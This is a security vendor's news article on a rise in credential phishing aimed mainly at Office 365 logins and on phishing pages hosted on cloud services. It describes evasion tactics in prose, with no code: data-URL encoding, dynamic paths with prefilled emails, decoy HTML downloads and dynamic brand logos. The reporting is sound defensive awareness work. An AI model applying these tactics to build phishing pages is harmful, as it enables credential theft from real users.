Member Article
Credential phishing attacks on the rise with Office 365 as top target
Krishnan Subramanian, Security Researcher Menlo Labs
Credential phishing attacks are where attackers make use of fake login pages or forms to steal credentials of commonly used services within a corporate environment. At Menlo Labs, we have seen a number of interesting developments over the last month with a rise in credential phishing campaigns. Here we take a look at some of the latest tactics and themes being employed.
Office 365 remains top target In the last month, the bulk of the credential phishing attacks were serving fake Outlook and Office 365 (O365) login pages, due primarily to the ubiquity of Office 365 services across corporate environments.
Looking at the distribution of Office 365 credential phishing campaigns targeting industry sectors, we can see airline duty free shop login credentials being targeted, which explains the significant contribution of the travel industry to this (more than 50% ).
Popular cloud services There has also been an uptick on the number of phishing pages being hosted on popular cloud services. While services like Azure, One Drive, Firebase, Box, and Dropbox continue to be leveraged to host phishing pages, one interesting addition to this list that we came across last month was a phishing page hosted on the popular note taking app Evernote.
Attackers are always trying to come up with different tactics to bypass detection solutions. Below are some of the common tactics that are actively being used to serve phishing content.
Using data URLs and/or encoding to mask content: In a specific phishing HTML page content, we observed the use of Data-URLs to hide the actual javascript code that posts credentials to a remote URL, and to encode and embed all custom CSS/Images on the page itself.
Dynamic Content Generation: One interesting tactic that was observed with an Office 365 phishing campaign: this campaign seems to be appending the user’s email address on the URL, the phishing page path is dynamically generated, and the user’s email address is automatically filled.
Given the path for the phishing landing page is dynamically generated, the path name is fairly long with random characters. There are two parts separated by the slash (/) character. The first part is a randomly generated folder name, followed by a randomly generated .php file.
Downloading local files as a decoy for serving the phishing page: Another commonly used tactic seen was to use local HTML/PDF decoy files to load phishing content. In a specific example targeting Daum, a popular web service provider in South Korea, visiting the phishing landing page first downloads a decoy HTML file to the endpoint. The email is appended to the URL as a parameter, and on visiting, immediately triggers a download to the endpoint. Once the local HTML file is opened, the actual phishing form is loaded with the filled username. Having a decoy file like this to load the phishing form is an attempt to evade detection solutions that might use machine learning or pattern matching on the HTTP response content.
Dynamic loading of brand logos: Phishing pages often make use of APIs like ClearBit to dynamically load company specific logos instead of generic Microsoft or Outlook logos. In this case, the phishing page tries to search for a company specific logo using the Clear Bit Logo API. If not found, regular Microsoft or Office logos are used.
Cybercriminals are trying to add complexity in order to carry out phishing campaigns to steal sensitive information. With free services like Let’s Encrypt, it is becoming easier for attackers to host phishing sites behind SSL with a relatively short TTL for maximum hit rate.
Increasing cybersecurity awareness through the use of training and education initiatives is often helpful in reducing the impact of credential phishing attacks, but corporate users should be cautious when a site presents a form that asks for personal or sensitive information.
This was posted in Bdaily's Members' News section by Amanda Hassall .